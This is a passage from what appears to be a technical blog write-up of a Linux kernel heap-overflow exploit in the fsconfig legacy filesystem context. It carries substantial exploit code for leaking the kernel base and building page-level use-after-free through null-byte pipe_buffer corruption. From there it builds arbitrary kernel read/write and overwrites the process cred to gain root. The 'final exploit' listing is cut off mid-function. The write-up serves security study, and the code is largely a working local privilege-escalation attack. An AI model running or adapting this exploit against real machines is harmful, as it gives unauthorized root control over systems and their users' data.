    return msgget(key, msgflg);
}

long send_msg(int msqid, void* msgp, size_t msgsz, int msgflg){

    return msgsnd(msqid, msgp, msgsz, msgflg);
}

long recv_msg(int msqid, void* msgp, size_t msgsz, long msgtyp, int msgflg){
    return msgrcv(msqid, msgp, msgsz, msgtyp, msgflg);
}

int fsopen(const char *fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fsfd, unsigned int cmd, 
             const char *key, const void *val, int aux)
{
    return syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);
}

uint64_t do_check_leak(char *buf) 
{
    uint64_t kbase = ((unsigned long*)buf)[510];
    if(!kbase){
        return 0;
    }   
    kbase -= SINGLE_START_OFFSET; 
    return kbase;
}

uint64_t do_leak(){
    uint64_t kernel_base;
    char pat[0x1000] = {0};
    char buffer[0x2000] = {0}, recieved[0x2000] = {0};      //PAGE_SIZE*2
    int targets[0x10] = {0};
    msg* message = (msg* )(buffer); 
    int size = 0x1018;      
    /* msg_msg: (0x30)head, (0xfd0)message_0
     * msg_msgseg: (0x8)head, (0x18)message_1, for kmalloc-32 :)
     * */

    /* spray the msg_msg */
    for(int i = 0; i < 8; i++){
        memset(buffer, 0x41+i, sizeof(buffer));
        targets[i] = get_msg(IPC_PRIVATE, 0666|IPC_CREAT);
        send_msg(targets[i], message, size - 0x30, 0);      /* spray the 0x1018 msg_msg from the kmalloc-4k */
    }

    memset(pat, 0x42, sizeof(pat));
    pat[sizeof(pat) - 1] = '\x00';

    info_log("Opening the ext4 filesystem");
    fd = fsopen("ext4", 0);
    if (fd < 0) {
        puts("Opening");
        exit(-1);
    }
    for (int i = 0; i < 186; i++) {
        fsconfig(fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
    }
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", "P", 0);

    /* overflow, hopefully causes an OOB read on a potential msg_msg object below */
    info_log("Overflowing...");
    pat[21] = '\x00';
    char evil[] = "\x60\x10";
    /* it will write 23(21 + ',' + '=') bytes
     * but the up(4095) reserve '\x00', one byte
     * so this time we overflow 22 byte 
     * */
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);

    // spray more msg_msg
    /* it will spray the legacy data in some one spraying obj 
     * that is because kmalloc-cg-4k from a 8K chunk :)
     * it could include 8 kmalloc-cg-4k
     * we can use cmd [sudo cat /proc/slabinfo] for checking
     * */
    for (int i = 8; i < 0x10; i++) 
    {
        memset(buffer, 0x41+i, sizeof(buffer));
        targets[i] = get_msg(IPC_PRIVATE, 0666 | IPC_CREAT);
        send_msg(targets[i], message, size - 0x30, 0);
    }

    info_log("overflow the msg->m_ts");
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", evil, 0);

    info_log("heap overflow done");
    info_log("Start spraying kmalloc-32 for seq_operations");

    size = 0x1060;
    for(int i = 0; i < 100; i++){
        open("/proc/self/stat", O_RDONLY);
    } 

    info_log("Recieving the leak data...");

    for(int j = 0; j < 0x10; j++){
        recv_msg(targets[j], recieved, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
        kernel_base = do_check_leak(recieved);
        //kernel_base = ((unsigned long *)recieved)[511];
        if(kernel_base){
            PRINT_ADDR("kernel_base", kernel_base);
            close(fd);
            return kernel_base;
        }
    }
    error_log("leak kernel_base failed!");
    return 0;
}

int main(void)
{   
    unshare(CLONE_NEWNS | CLONE_NEWUSER);
    bind_cpu(0);
    do_leak();
    return 0;
}

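2. Exploiting with userfaultfd

With the kernel base leaked, the next question is how to exploit the bug. Reading the source shows that msgsnd reaches load_msg, which uses copy_from_user to copy the buf we pass in into the newly created msg: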

struct msg_msg *load_msg(const void __user *src, size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg *seg;
        int err = -EFAULT;
        size_t alen;

        msg = alloc_msg(len);
        if (msg == NULL)
                return ERR_PTR(-ENOMEM);

        alen = min(len, DATALEN_MSG);
        if (copy_from_user(msg + 1, src, alen))                 // this touches our __user *src pointer, so userfaultfd can stall the kernel right here
                goto out_err;

        for (seg = msg->next; seg != NULL; seg = seg->next) {
                len -= alen;
                src = (char __user *)src + alen;
                alen = min(len, DATALEN_SEG);
                if (copy_from_user(seg + 1, src, alen))
                        goto out_err;
        }

        err = security_msg_msg_alloc(msg);
        if (err)
                goto out_err;

        return msg;

out_err:
        free_msg(msg);
        return ERR_PTR(err);
}

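As we know, load_msg first calls alloc_msg to allocate a msg_msg, quite possibly with msg_msgseg chunks as well. Once the space is allocated and control returns to load_msg, copy_from_user copies our user-space data into the msg_msg. If, after the allocation but before copy_from_user has finished, we modify the msg_msg->next pointer of our message, we get an arbitrary write.

Pulling off this kind of precisely timed operation is possible on kernels before 5.11 by using userfaultfd to win the race.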

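3. Null-byte heap overflow

This approach is very clever. It first appeared in arttnba3's author notes for a d3ctf challenge and was then applied to this vulnerability. It works in a simple pwn environment and also sidesteps the userfaultfd permission restrictions introduced after kernel 5.11. On top of that, overflowing a single null byte on the heap is all it takes to escalate privileges. Seriously impressive.

1. Background knowledge

How can a single byte get us an address leak, let alone privilege escalation? Overflowing just one byte into certain structures, without breaking their layout, is a good approach, and given how random kernel addresses are we may as well make that byte a null byte.

If the structure we overflow into has a pointer as its first field, we can alter that pointer so that it points somewhere we are more likely to control. Following the hint in the blog post, we pick the pipe_buffer structure, which is defined as follows: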

/**
 *        struct pipe_buffer - a linux kernel pipe buffer
 *        @page: the page containing the data for the pipe buffer
 *        @offset: offset of data inside the @page
 *        @len: length of data inside the @page
 *        @ops: operations associated with this buffer. See @pipe_buf_operations.
 *        @flags: pipe buffer flags. See above.
 *        @private: private data owned by the ops.
 **/
struct pipe_buffer {
        struct page *page;
        unsigned int offset, len;
        const struct pipe_buf_operations *ops;
        unsigned int flags;
        unsigned long private;
};

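Here is a brief description of the fields that matter most for this exploit:

page: the page that holds this pipe_buffer's contents
offset: the offset of this pipe_buffer's data within the page, which is also where the read system call reads from
len: the total length of this pipe_buffer's data; offset+len is where the write system call writes to

The structure begins with a pointer to a struct page. A struct page is 0x40 bytes, which divides 0x100 evenly (so the low byte of a struct page pointer can only be \x00, \x40, \x80 or \xc0). With heap spraying we can therefore expect to overwrite the low byte of some pipe_buffer's page pointer with \x00 and make it point to the struct page that another pipe_buffer already points to, as illustrated below:

Above are two freshly allocated pipe_buffers. Now assume the page pointer of one of them has a low byte of \x00 (a 1/4 chance).

Then we use the null-byte overflow to overwrite the low byte of the other one, which is not \x00.

Both pointers now refer to the same struct page, and freeing one of the pipes gives us a page-level UAF.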
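The effect of the null byte on a struct page pointer can be sketched with plain integer arithmetic. The 0x40 size is the one stated above; the helper names and the example addresses are made up for illustration.

```c
#include <stdint.h>

#define SK_STRUCT_PAGE_SIZE 0x40ULL   /* sizeof(struct page), as stated above */

/* Pointer value after a single '\0' lands on its least significant byte. */
static uint64_t after_null_byte(uint64_t page_ptr)
{
    return page_ptr & ~0xffULL;
}

/* How many struct page entries the pointer moved backwards (0..3). */
static unsigned int pages_skipped(uint64_t page_ptr)
{
    return (unsigned int)((page_ptr - after_null_byte(page_ptr)) / SK_STRUCT_PAGE_SIZE);
}
```

A pointer ending in \x40, \x80 or \xc0 is pulled back by one, two or three entries onto the struct page whose low byte is \x00, which is why a neighbouring pipe_buffer that already points there ends up sharing the page.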

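One problem, however, is that the pipe_buffer array is normally allocated from kmalloc-cg-1k, which the buddy system backs with order-2 pages, whereas our legacy_data comes from kmalloc-cg-4k, backed by order-3 pages. So we cannot get a suitable pipe_buffer array through the usual call chain, shown here: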

do_pipe2
        __do_pipe_flags
                create_pipe_files
                        get_pipe_inode                         // sets the fops of this pipe inode to pipefifo_fops
                                alloc_pipe_info
                                        kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT)
                                        kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT)

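This chain makes the pipe_buffer array come from kmalloc-cg-1k. pipe_bufs is set to the constant 16 at the start of the function and struct pipe_buffer is 0x28 bytes, so the product gives 512 < 0x280 < 0x400 and the array is taken from kmalloc-cg-1k, order-2.

So we look for another way to change the size of our pipe_buffer array.

Changing pipe_bufs in that kcalloc is impossible from within the pipe system call, but we can use the fcntl system call. Let's take a look at its source: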

SYSCALL_DEFINE3(fcntl, unsigned int, fd, unsigned int, cmd, unsigned long, arg)
{        
        struct fd f = fdget_raw(fd);
        long err = -EBADF;

        if (!f.file)
                goto out;

        if (unlikely(f.file->f_mode & FMODE_PATH)) {
                if (!check_fcntl_cmd(cmd))
                        goto out1;
        }

        err = security_file_fcntl(f.file, cmd, arg);
        if (!err)
                err = do_fcntl(fd, cmd, arg, f.file);

out1:
         fdput(f);
out:
        return err;
}

static long do_fcntl(int fd, unsigned int cmd, unsigned long arg,
                struct file *filp)
{
        void __user *argp = (void __user *)arg;
        struct flock flock;
        long err = -EINVAL;
    switch (cmd) {
        ...
                case F_SETPIPE_SZ:
                case F_GETPIPE_SZ:
                err = pipe_fcntl(filp, cmd, arg);
                break;

        ...

                default:
                break;
        }
        return err;
}

With the F_SETPIPE_SZ command we reach the function pipe_fcntl:

long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg)
{
        struct pipe_inode_info *pipe;
        long ret;

        ...

        switch (cmd) {
        case F_SETPIPE_SZ:
                ret = pipe_set_size(pipe, arg);
                break;
                ...
        }

        __pipe_unlock(pipe);
        return ret;
}

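It calls pipe_set_size, which is very tempting: from the name alone we can guess that it lets us set the size of the pipe_buffer array.

/*
 * Allocate a new array of pipe_buffers (i.e. call kcalloc) and copy the existing data over.
 * Returns the size on success, or -ERROR on error.
 */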
static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
        unsigned long user_bufs;
        unsigned int nr_slots, size;
        long ret = 0;

        size = round_pipe_size(arg);
        nr_slots = size >> PAGE_SHIFT;

        ...

        ret = pipe_resize_ring(pipe, nr_slots);
        ...

        return ret;
}

This calls pipe_resize_ring to reallocate the pipe_buffer array:

/*
 * Resize the pipe ring to a number of slots.
 */
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
        ...

        bufs = kcalloc(nr_slots, sizeof(*bufs),
                       GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
        ...
        kfree(pipe->bufs);
        pipe->bufs = bufs;
        pipe->ring_size = nr_slots;
        if (pipe->max_usage > nr_slots)
                pipe->max_usage = nr_slots;
        pipe->tail = tail;
        pipe->head = head;

        /* This might have made more room for writers */
        wake_up_interruptible(&pipe->wr_wait);
        return 0;
}

If the nr_slots we pass is 64, four times the previous value, the total allocation is 2k < 0xA00 < 4k, so the pipe_buffer array is allocated from kmalloc-cg-4k and can interact with our legacy_data.
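The size-class reasoning for 16 versus 64 slots can be written down as a small calculation. This is a simplified model of kmalloc's power-of-two caches (the 96- and 192-byte caches are ignored since they do not matter at these sizes), using the 0x28 size stated above; kmalloc_size_class and pipe_ring_size_class are hypothetical names.

```c
#include <stddef.h>

#define SK_PIPE_BUFFER_SIZE 0x28UL   /* sizeof(struct pipe_buffer), as stated above */

/* Smallest power-of-two size class that fits `size` (simplified model). */
static size_t kmalloc_size_class(size_t size)
{
    size_t cls = 8;
    while (cls < size)
        cls <<= 1;
    return cls;
}

/* Size class backing a pipe ring with `nr_slots` pipe_buffer entries. */
static size_t pipe_ring_size_class(size_t nr_slots)
{
    return kmalloc_size_class(nr_slots * SK_PIPE_BUFFER_SIZE);
}
```

In user space, since pipe_set_size derives nr_slots as size >> PAGE_SHIFT, a call such as fcntl(pipefd[1], F_SETPIPE_SZ, 64 * 0x1000) would be the way to request the 64-slot ring, assuming 4 KiB pages.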

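2. Arbitrary address read/write

Next we go from the single-byte overflow all the way to arbitrary address read/write.

step I: building the first-level UAF

We first spray a large number of pipes, which sets things up for the repeated reallocations later.

Then, much like in the base address leak, we spray msg_msg and use the overflow to overwrite the m_ts field of a msg_msg with a large value for an out-of-bounds read, ending up in the following situation:

We can then use the write again to reach the object that follows the adjacent msg_msg, overflowing exactly one null byte into it.

(Why not overflow directly into the msg_msg adjacent to legacy_fs_context? Because triggering the integer overflow means that an '=' and a \x00 are inevitably written into that first adjacent msg_msg, so we choose to overflow into the next 4k page instead.)

The structure we target this time is pipe_buffer. From the background above we know fcntl can change the size of the pipe_buffer array; we set it to 64 buffers per allocation, that is 64*0x28 bytes. That chunk also comes from order-3 pages, so we can free a msg_msg and then use fcntl to reallocate a pipe_buffer array in its place, which sets up the overflow.

We then keep writing into legacy_data until the low byte of the page pointer of the pipe_buffer next to our (broken) msg_msg becomes \x00.

With high probability this gives us two pipe_buffers pointing at the same page, as shown below:

step II: building the second-level UAF

If we now free one of the pipes, the physical page behind that struct page is freed, which gives us a UAF. If we then allocate a pipe_buffer array again, it is carved from the 4k object that was just freed, producing the following situation:

Now we can build another UAF, mainly so that we can freely modify the page afterwards. We repeat the previous operation and reallocate the pipe_buffer array once more, as follows: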

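step III: building self-writing pipes

At this point the page referenced by the second-level UAF holds multiple pipe_buffers. We make one of those pipe_buffers point one level up, that is, at the struct page of the physical page it lives in, as follows:

Our last-level pipe_buffer can now write into the very page it resides in.

step IV: building the arbitrary read/write system

Being able to write our own page may not look related to arbitrary read/write, but the read/write system built next is where the real elegance lies.

First we build three of the self-writing pipes described above at the same time.

With three self-writing pipes in one page, we can keep rewriting each other's offset/len fields to get a reusable read/write primitive. The pipes play the following roles:

Pipe 1 performs reads/writes on arbitrary memory
Pipe 2 repairs and restores pipe 3
Pipe 3 modifies pipe 1 and restores pipe 2

These three self-writing pipes give us arbitrary address read/write. The system may be hard to follow from a description alone; it takes a thorough understanding of the code and of the pipe_buffer layout to see it clearly, but once it clicks everything flows very naturally.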

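3. Address leak and privilege escalation

We know that struct page maps linearly onto physical pages, and that the array of struct page lives in the vmemmap region.

So once we know the vmemmap_base address, we can read and write every physical page described by the array.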

========================================================================================================================
    Start addr    |   Offset   |     End addr     |  Size   | VM area description
========================================================================================================================
                  |            |                  |         |
 0000000000000000 |    0       | 00007fffffffffff |  128 TB | user-space virtual memory, different per mm
__________________|____________|__________________|_________|___________________________________________________________
                  |            |                  |         |
 0000800000000000 | +128    TB | ffff7fffffffffff | ~16M TB | ... huge, almost 64 bits wide hole of non-canonical
                  |            |                  |         |     virtual memory addresses up to the -128 TB
                  |            |                  |         |     starting offset of kernel mappings.
__________________|____________|__________________|_________|___________________________________________________________
                                                            |
                                                            | Kernel-space virtual memory, shared between all processes:
____________________________________________________________|___________________________________________________________
                  |            |                  |         |
 ffff800000000000 | -128    TB | ffff87ffffffffff |    8 TB | ... guard hole, also reserved for hypervisor
 ffff880000000000 | -120    TB | ffff887fffffffff |  0.5 TB | LDT remap for PTI
 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)
 ffffc88000000000 |  -55.5  TB | ffffc8ffffffffff |  0.5 TB | ... unused hole
 ffffc90000000000 |  -55    TB | ffffe8ffffffffff |   32 TB | vmalloc/ioremap space (vmalloc_base)
 ffffe90000000000 |  -23    TB | ffffe9ffffffffff |    1 TB | ... unused hole
 ffffea0000000000 |  -22    TB | ffffeaffffffffff |    1 TB | virtual memory map (vmemmap_base)
 ffffeb0000000000 |  -21    TB | ffffebffffffffff |    1 TB | ... unused hole
 ffffec0000000000 |  -20    TB | fffffbffffffffff |   16 TB | KASAN shadow memory
__________________|____________|__________________|_________|____________________________________________________________
                                                            |
                                                            | Identical layout to the 56-bit one from here on:
____________________________________________________________|____________________________________________________________
                  |            |                  |         |
 fffffc0000000000 |   -4    TB | fffffdffffffffff |    2 TB | ... unused hole
                  |            |                  |         | vaddr_end for KASLR
 fffffe0000000000 |   -2    TB | fffffe7fffffffff |  0.5 TB | cpu_entry_area mapping
 fffffe8000000000 |   -1.5  TB | fffffeffffffffff |  0.5 TB | ... unused hole
 ffffff0000000000 |   -1    TB | ffffff7fffffffff |  0.5 TB | %esp fixup stacks
 ffffff8000000000 | -512    GB | ffffffeeffffffff |  444 GB | ... unused hole
 ffffffef00000000 |  -68    GB | fffffffeffffffff |   64 GB | EFI region mapping space
 ffffffff00000000 |   -4    GB | ffffffff7fffffff |    2 GB | ... unused hole
 ffffffff80000000 |   -2    GB | ffffffff9fffffff |  512 MB | kernel text mapping, mapped to physical address 0
 ffffffff80000000 |-2048    MB |                  |         |
 ffffffffa0000000 |-1536    MB | fffffffffeffffff | 1520 MB | module mapping space
 ffffffffff000000 |  -16    MB |                  |         |
    FIXADDR_START | ~-11    MB | ffffffffff5fffff | ~0.5 MB | kernel-internal fixmap range, variable size and offset
 ffffffffff600000 |  -10    MB | ffffffffff600fff |    4 kB | legacy vsyscall ABI
 ffffffffffe00000 |   -2    MB | ffffffffffffffff |    2 MB | ... unused hole
__________________|____________|__________________|_________|___________________________________________________________

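The KASLR granularity is 256 MB. While building the self-writing pipe above we leaked the address of a struct page, so we can derive a candidate vmemmap_base from it simply by clearing its low 28 bits.

It is only a candidate because, once the machine has more than 16 GB of RAM, the pages array grows beyond (0x400000000/0x1000)*0x40 = 0x10000000 bytes, which is exactly the KASLR granularity. Clearing the low bits is therefore just a guess, and we still have to verify that the vmemmap_base we obtained is correct.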
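The arithmetic behind that guess can be sketched in a few lines of C. This is only an illustration, not part of the exploit: the helper names (page_array_bytes, vmemmap_guess, vmemmap_candidates) are made up for this example, and it assumes 4 KB pages, a 0x40-byte struct page and the 256 MB granularity mentioned above.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE        0x1000ULL      /* assumed 4 KB pages */
#define STRUCT_PAGE_SIZE 0x40ULL        /* assumed sizeof(struct page) */
#define KASLR_ALIGN      0x10000000ULL  /* 256 MB granularity, as stated above */

/* Bytes of struct page entries needed to describe ram_bytes of memory. */
static inline uint64_t page_array_bytes(uint64_t ram_bytes)
{
    return (ram_bytes / PAGE_SIZE) * STRUCT_PAGE_SIZE;
}

/* First guess for vmemmap_base: clear the low 28 bits of the leaked pointer. */
static inline uint64_t vmemmap_guess(uint64_t leaked_page)
{
    assert(leaked_page != 0);
    return leaked_page & ~(KASLR_ALIGN - 1);
}

/* Rough count of 256 MB aligned candidates to try, walking down from the
 * guess. Holes in the physical address space are ignored here. */
static inline uint64_t vmemmap_candidates(uint64_t ram_bytes)
{
    return (page_array_bytes(ram_bytes) + KASLR_ALIGN - 1) / KASLR_ALIGN;
}
```

With 16 GB of RAM, page_array_bytes() gives 0x10000000, so a single candidate is enough. With more memory the leaked page may sit in a later 256 MB window, which is why the exploit below steps vmemmap_base down by 0x10000000 when the check fails.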

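To verify it, we rely on secondary_startup_64, a function written in assembly that is used in real mode during the Linux kernel boot process. A pointer to this function is stored at physical address 0x9d000. (My guess as to why the location is fixed: real mode works directly with physical addresses, so the pointer is simply kept at a fixed place for later use.)

We can also inspect the kernel image with objdump and see this function there, right at the beginning.

Its address is at offset 0x30 into the kernel text segment, so we use this as our check: a value read from that page that looks like a kernel text pointer and ends in 0x030 tells us the vmemmap_base guess is correct.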
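The check itself is small enough to sketch on its own. The constants (0x9d000, offset 0x30, the unrandomized text base 0xffffffff81000000) are the ones this post's exploit uses. The helper names are hypothetical, and the offset 0x30 is specific to the kernel build analyzed here.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define KERNEL_TEXT_FLOOR 0xffffffff81000000ULL /* text base without KASLR */
#define STARTUP_OFFSET    0x30ULL               /* secondary_startup_64 offset on this build */

/* Address of the struct page that describes physical address phys. */
static inline uint64_t phys_to_page(uint64_t vmemmap_base, uint64_t phys)
{
    return vmemmap_base + (phys / 0x1000ULL) * 0x40ULL;
}

/* Does the first qword read from the page look like &secondary_startup_64? */
static inline bool looks_like_secondary_startup_64(uint64_t qword)
{
    return qword > KERNEL_TEXT_FLOOR && (qword & 0xfffULL) == STARTUP_OFFSET;
}

/* Recover the randomized kernel base from a verified pointer. */
static inline uint64_t kernel_base_from(uint64_t qword)
{
    assert(looks_like_secondary_startup_64(qword));
    return qword - STARTUP_OFFSET;
}
```

For physical address 0x9d000 the page index is 157, so the struct page to read through the pipe primitive is vmemmap_base + 157*0x40, which matches the arbitrary_read_by_pipe() call in the exploit.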

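With the method above we obtain the kernel base address. We still need page_offset_base, that is, the virtual address at which the physmap (direct mapping) starts. For this we use the ptraced field of task_struct: when the process is not being traced, this field points to itself, and that address lies inside the physmap.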
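As a rough sketch of that calculation: the self-pointing ptraced value gives the task's direct-map address, and subtracting the page's physical offset leaves the physmap base. The offset 2280 is the one the exploit below uses for the author's kernel build and will differ on other builds. The helper names are invented for this example.

```c
#include <assert.h>
#include <stdint.h>

/* offsetof(struct task_struct, ptraced) on the build used in this post;
 * an assumption that must be re-checked for any other kernel. */
#define PTRACED_OFF 2280ULL

/* ptraced is an empty list head, so its stored pointer is its own address. */
static inline uint64_t task_from_ptraced(uint64_t ptraced_next)
{
    assert(ptraced_next > PTRACED_OFF);
    return ptraced_next - PTRACED_OFF;
}

/* page_index is the index of the struct page through which the task was
 * found; the mask absorbs the in-page offset and off-by-one page errors. */
static inline uint64_t physmap_base_from(uint64_t task_va, uint64_t page_index)
{
    uint64_t base = task_va - page_index * 0x1000ULL;
    return base & ~0xfffffffULL;
}
```

For example, a task found through page index 0x12345 at direct-map address 0xffff888012345940 yields a base of 0xffff888000000000, the non-randomized page_offset_base from the table above.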

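Once we know the base of the physmap linear mapping, we can find the struct page for any direct-map virtual address, which gives us truly arbitrary read and write. We use it to locate our own process's task_struct (we tag the comm field of task_struct with prctl's PR_SET_NAME and then search memory page by page for that tag), and then follow the parent field upward, parent after parent, until we reach the init process. In my own debugging, however, the walk ended at the swapper process, whose pid is 0, rather than at init, whose pid is 1. This does not affect the final privilege escalation.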
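Both ideas can be tried safely in user space. The sketch below tags the calling thread with PR_SET_NAME, searches a dumped page for the tag (a plain loop standing in for the memmem() call in the exploit), and walks a mock parent chain. struct mock_task and all helper names are made up for illustration. The walk stops when a task is its own parent, and as far as I know the kernel's init_task (swapper, pid 0) is set up that way, which would explain why the walk ends at pid 0 instead of pid 1.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/prctl.h>

/* Tag the calling thread; the kernel stores the name in task_struct.comm. */
static inline int set_comm_marker(const char *marker)
{
    return prctl(PR_SET_NAME, marker, 0, 0, 0);
}

/* Byte offset of marker inside a dumped page, or -1 if it is not there. */
static inline long find_marker(const unsigned char *dump, size_t len,
                               const char *marker)
{
    size_t mlen = strlen(marker);
    assert(mlen > 0);
    for (size_t off = 0; off + mlen <= len; off++)
        if (memcmp(dump + off, marker, mlen) == 0)
            return (long)off;
    return -1;
}

/* User-space mock of the task_struct fields the walk cares about. */
struct mock_task {
    int pid;
    struct mock_task *real_parent;
    const void *cred;
};

/* Follow real_parent until a task turns out to be its own parent. */
static inline struct mock_task *walk_to_root(struct mock_task *t)
{
    while (t->real_parent != t)
        t = t->real_parent;
    return t;
}
```

In the real exploit the "dump" is a page read through the pipe primitive and the cred pointer of the root task is copied into the tagged task_struct. Here everything stays in ordinary process memory.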

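Finally, we only need to write the address of the init/swapper process's cred into the cred field of the current process to escalate privileges. The result is as follows: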

The final exploit is as follows:

#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>

#define MSG_NOERROR     010000  /* no error if message is too big */
#define MSG_COPY        040000  /* copy (not remove) all queue messages */

#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif

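/* Fallback values for x86-64. They are only a safety net: the exploit
 * calls the libc wrappers msgget/msgsnd/msgrcv directly. */
#ifndef __NR_msgget
#define __NR_msgget 68
#endif

#ifndef __NR_msgsnd
#define __NR_msgsnd 69
#endif

#ifndef __NR_msgrcv
#define __NR_msgrcv 70
#endif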

/* to run the exp on the specific core only */
void bind_cpu(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

int fs_fd;                 /* fd of the filesystem context returned by fsopen() */

#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)

void info_log(char* str){
         printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
  printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
  exit(1);
}

long get_msg(void){
    return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long send_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
    /* the fourth argument is the message type, stored in msgbuf.mtype */
    ((struct msgbuf *)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

long recv_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

long copy_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
    return msgrcv(msqid, msgp, msgsz, msgtyp, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
}

int fsopen(const char *fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fsfd, unsigned int cmd, 
             const char *key, const void *val, int aux)
{
    return syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);
}

void prepare_for_overwrite(){
    puts("Opening the ext4 filesystem");
    fs_fd = fsopen("ext4", 0);
    if (fs_fd < 0) {
        perror("fsopen");
        exit(-1);
    }
    for (int i = 0; i < 186; i++) {
        fsconfig(fs_fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
    }
    fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "P", 0);

}

#define PIPE_SPRAY_NR 0x100
#define MSG_SPRAY_NR 0x100
#define MSG_SZ (0x1000 - 0x30 + 0x20 - 0x8)
#define OOB_READ_SZ (0x2000 - 0x30 - 0x8)
#define MSG_TYPE 0x41414141
int pipe_fd[PIPE_SPRAY_NR][2];
int msqid[MSG_SPRAY_NR];
int victim_qidx = -1;

void occupy_4k_obj_by_msg(){
    size_t buf[0x1000];
    char pat[0x100];
    info_log("Step I:Construct the first page uaf...");

    puts("Allocating the pipe...");
    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(pipe(pipe_fd[i]) < 0){
            error_log("Allocating the pipe failed!");
        }
    }

    puts("Allocating the msg_queue and msg_msg...");
    for(int i = 0; i < MSG_SPRAY_NR - 8; i++){
        if((msqid[i] = get_msg()) < 0){
            error_log("Allocating the msg_queue failed!");
        }
        buf[0] = i;
        buf[MSG_SZ/8] = i;
        if(send_msg(msqid[i], buf, MSG_SZ, MSG_TYPE)){
            error_log("Write the msg failed!");
        }
    }

    prepare_for_overwrite();
    memset(pat, '\x42', sizeof(pat));
    pat[21] = '\x00';
    fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", pat, 0);

    for(int i = MSG_SPRAY_NR - 8; i < MSG_SPRAY_NR; i++){
        if((msqid[i] = get_msg()) < 0){
            error_log("Allocating the msg_queue failed!");
        }
        buf[0] = i;
        buf[MSG_SZ/8] = i;
        /* note: together with the call in the if below, this sends the message twice; ret is not used */
        int ret = send_msg(msqid[i], buf, MSG_SZ, MSG_TYPE); 
        if(send_msg(msqid[i], buf, MSG_SZ, MSG_TYPE)){
            error_log("Write the msg failed!");
        }
    }
    puts("Trying to overwrite the msg_msg->m_ts...");
    fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);
    puts("Trying to make an oob read...");
    for(int i = 0; i < MSG_SPRAY_NR; i++){
        int read_sz = copy_msg(msqid[i], buf, OOB_READ_SZ, 0);
        if(read_sz < 0){
            error_log("read msg failed!");
        }else if(read_sz > MSG_SZ){
            victim_qidx = i;
            break;
        }
    }
    if(victim_qidx == -1){
        error_log("failed to find the victim_qidx!");
    }
    printf("\033[0m\033[1;34mWe found the victim_msq_queue_idx\033[0m:%d\n", victim_qidx);
}

int victim_pid = -1, orig_pid;

void construct_first_uaf(){
    size_t buf[0x1000];
    info_log("Step II:Construct the first page level uaf");
    puts("We need to free the msg_msg except the corrupted one!");
    for(int i = 0; i < MSG_SPRAY_NR; i++){
        if(i == victim_qidx){
            continue;
        }
        if(recv_msg(msqid[i], buf, MSG_SZ, 0) < 0){
            error_log("unlink the msg_msg failed!");
        }
        if(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000*64) < 0){     /* pipe_buffers is 64*0x28 */
            error_log("realloc pipe failed...");
        }
        write(pipe_fd[i][1], "peiadhao", 8);
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], "peiadhao", 8);
        write(pipe_fd[i][1], "peiadhao", 8);
    }
    puts("Overflow the pipe_buffers by one null byte...");
    for(int i = 0; i < 185; i++){
        fsconfig(fs_fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
    }

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        char tmp[0x10];
        int nr;

        if(i == victim_qidx){
            continue;
        }

        if(read(pipe_fd[i][0], tmp, 8) < 0){
            error_log("read pipe failed!");
        }
        if(read(pipe_fd[i][0], &nr, sizeof(int)) < 0){
            error_log("read pipe failed!");
        }
        /* tmp holds 8 raw bytes with no terminator, so compare by length */
        if(!memcmp(tmp, "peiadhao", 8) && nr != i){
            orig_pid = i;
            victim_pid = nr;
            break;
        }
    }
    if(victim_pid == -1){
        error_log("failed to find the uaf one!");
    }

